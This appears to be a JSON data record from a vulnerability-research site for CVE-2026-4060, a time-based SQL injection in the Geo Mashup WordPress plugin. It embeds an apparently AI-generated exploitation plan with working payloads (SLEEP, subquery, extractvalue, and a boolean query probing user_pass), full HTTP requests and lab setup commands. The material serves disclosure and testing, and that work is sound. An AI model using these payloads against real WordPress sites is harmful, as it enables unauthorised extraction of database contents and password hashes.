[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGaAbJ_P6QZ_LOQB3c-YZeUUeomxFtQiX-XyMvtFAYPo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-4060","geo-mashup-unauthenticated-time-based-sql-injection-via-sort-parameter","Geo Mashup \u003C= 1.13.18 - Unauthenticated Time-Based SQL Injection via 'sort' Parameter","The Geo Mashup plugin for WordPress is vulnerable to Time-Based SQL Injection via the 'sort' parameter in all versions up to, and including, 1.13.18. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. The `esc_sql()` function is applied but is ineffective in the `ORDER BY` context because the value is not enclosed in quotes. Additionally, while a `sanitize_sort_arg()` allowlist-based sanitizer was added in version 1.13.18, it is only applied in the AJAX code path (`sanitize_query_args()`) and not in the `render-map.php` or template tag code paths. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via a time-based blind approach.","geo-mashup",null,"\u003C=1.13.18","1.13.19","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-01 00:00:00","2026-05-05 13:56:02",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2fa5ae9a-532c-40f9-b70a-217f0f9cd473?source=api-prod",5,[22,23,24,25,26,27,28,29],"geo-mashup-db.php","geo-mashup-options.php","geo-mashup.php","geo-query.php","php\u002FAdmin\u002FSettings\u002FOptionsPage.php","php\u002FSearch.php","readme.txt","vendor\u002Fcomposer\u002Finstalled.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-4060 (Geo Mashup SQL Injection)\n\n## 1. Vulnerability Summary\nThe Geo Mashup plugin (\u003C= 1.13.18) is vulnerable to a time-based blind SQL injection via the `sort` parameter. The vulnerability exists because user-supplied input for sorting is passed to an SQL `ORDER BY` clause after being processed by `esc_sql()`. While `esc_sql()` escapes quotes, it is ineffective in an `ORDER BY` context where the value is not enclosed in quotes, allowing an attacker to append additional SQL commands (e.g., `SLEEP()`). Although a sanitizer (`sanitize_sort_arg`) was added in 1.13.18 for AJAX paths, it was omitted in the `render-map.php` and template tag execution paths.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `[SITE_URL]\u002Fwp-content\u002Fplugins\u002Fgeo-mashup\u002Frender-map.php` (Direct access) or any page containing the `[geo_mashup_map]` shortcode.\n*   **Parameter:** `sort`\n*   **Authentication:** Unauthenticated (No login required).\n*   **Preconditions:**\n    *   The plugin is active.\n    *   At least one object (post, page, or user) has location data associated with it (to ensure the location query executes).\n\n## 3. Code Flow\n1.  **Entry Point:** An unauthenticated user requests `render-map.php` or a page with a Geo Mashup map.\n2.  **Input Handling:** The `render-map.php` script (or the shortcode handler `GeoMashup::map()`) retrieves query parameters from `$_GET`.\n3.  **Data Access:** These parameters are passed to `GeoMashupDB::get_object_locations( $args )` (defined in `geo-mashup-db.php`).\n4.  **Vulnerable Sink:** Inside `get_object_locations()`, the `$args['sort']` value is sanitized only with `esc_sql()` and then concatenated directly into the `ORDER BY` clause of the SQL query.\n5.  **SQL Construction (Inferred):** \n    `$query = \"SELECT ... FROM ... WHERE ... ORDER BY \" . esc_sql( $args['sort'] );`\n6.  **Execution:** The `$wpdb->get_results()` function executes the malformed query.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, this specific code path (`render-map.php`) lacks the sanitization and nonce checks applied to the AJAX path. `render-map.php` is traditionally designed to be loaded within an `\u003Ciframe>` and often does not implement WordPress nonces for its primary query parameters.\n*   **Nonce Requirement:** None (Expected unauthenticated\u002Funprotected).\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate a time delay using the `SLEEP()` function within the `ORDER BY` clause.\n\n### Step-by-Step Plan:\n1.  **Locate Target:** Determine if `render-map.php` is accessible at the standard path.\n2.  **Verify Location Data:** Ensure the database has at least one location to ensure the query is processed.\n3.  **Execute Baseline:** Request the target URL and measure response time.\n4.  **Execute Attack:** Request the target URL with a `sort` payload designed to trigger `SLEEP(5)`.\n5.  **Payloads:**\n    *   Simple: `?sort=id,sleep(5)`\n    *   Subquery (to bypass some filters): `?sort=id,(SELECT(1)FROM(SELECT(SLEEP(5)))a)`\n    *   Conditional: `?sort=id,IF(1=1,SLEEP(5),1)`\n\n### HTTP Request (Direct Path):\n```http\nGET \u002Fwp-content\u002Fplugins\u002Fgeo-mashup\u002Frender-map.php?map_name=all&sort=id,sleep(5) HTTP\u002F1.1\nHost: localhost\n```\n\n### HTTP Request (Shortcode Path):\nIf direct access to `render-map.php` is restricted (e.g., `ABSPATH` check), use a page where the map is rendered:\n```http\nGET \u002Fmap-test-page\u002F?sort=id,sleep(5) HTTP\u002F1.1\nHost: localhost\n```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure Geo Mashup 1.13.18 is installed and active.\n2.  **Create Location Data:**\n    ```bash\n    # Create a post\n    POST_ID=$(wp post create --post_title=\"Map Point\" --post_status=\"publish\" --format=ids)\n    # Geo Mashup synchronizes from these meta keys if 'copy_geodata' is enabled\n    wp post meta add $POST_ID geo_latitude 34.0522\n    wp post meta add $POST_ID geo_longitude -118.2437\n    ```\n3.  **Create Test Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Map Page\" --post_status=\"publish\" --post_content='[geo_mashup_map]' --post_name='map-test'\n    ```\n\n## 7. Expected Results\n*   **Baseline Request:** Returns in \u003C 1 second.\n*   **Exploit Request:** Returns in approximately 5 seconds (or the specified sleep duration).\n*   **Database state:** No change (Read-only injection).\n\n## 8. Verification Steps\n1.  **Monitor MySQL Logs:** If possible, watch the general query log to see the executed SQL.\n    ```sql\n    -- Example expected log entry:\n    SELECT ... FROM wp_geo_mashup_locations ... ORDER BY id,sleep(5)\n    ```\n2.  **WP-CLI Check:** Verify location data exists to confirm the query was eligible for execution.\n    ```bash\n    wp db query \"SELECT * FROM wp_posts WHERE post_title='Map Point'\"\n    ```\n\n## 9. Alternative Approaches\n*   **Error-Based:** If `WP_DEBUG` is on, try `?sort=id,extractvalue(1,concat(0x7e,database()))` to leak information in the error message.\n*   **Blind Boolean:** If sleep is throttled, use `CASE` statements to sort by different columns based on a condition:\n    `?sort=(CASE WHEN (SUBSTR(user_pass,1,1)='$') THEN id ELSE location_id END)`\n    Then observe the order of markers in the response JSON or HTML.\n*   **Search Path:** Use the Search widget entry point if `render-map.php` fails:\n    `GET \u002F?geo_mashup_search=test&sort=id,sleep(5)` (Inferred search parameter).","gemini-3-flash-preview","2026-05-04 17:27:30","2026-05-04 17:28:15",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","1.13.18","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeo-mashup\u002Ftags\u002F1.13.18","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgeo-mashup.1.13.18.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeo-mashup\u002Ftags\u002F1.13.19","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgeo-mashup.1.13.19.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeo-mashup\u002Ftags"]